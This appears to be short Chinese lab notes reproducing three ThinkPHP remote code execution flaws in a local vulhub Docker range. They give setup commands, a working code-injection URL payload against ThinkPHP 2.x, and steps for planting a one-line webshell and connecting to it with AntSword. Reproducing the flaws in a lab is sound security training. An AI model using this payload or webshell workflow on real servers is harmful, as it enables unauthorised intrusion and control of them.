2-rec
1.启动环境
cd /.../vulhub/thinkphp/2-rce # cd进入2-rce靶场文件环境下
docker-compose up -d # docker-compose启动靶场
docker ps -a # 查看开启的靶场信息
2.访问192.168.146.136:8080网页
3.构造payload
http://192.168.146.136:8080/?s=/Index/index/L/${@phpinfo()}
4.写入一句话木马使用蚁剑链接
5.0.23-rce
1.环境启动
cd vulhub/thinkphp/5.0.23-rce/ #进入漏洞环境所在目录
docker-compose up -d #启动靶场
docker ps #查看容器信息
2.访问192.168.146.136:8080网页
3.进行远程命令执行
4.访问shell.php,蚁剑连接
5-rce
1.环境启动
cd /vulhub/thinkphp/5-rce #进入漏洞环境所在目录
docker-compose up -d #启动靶场
docker ps #查看容器信息
2.访问192.168.146.136:8080网页
3.寻找漏洞点
4. 写一句话木马进行链接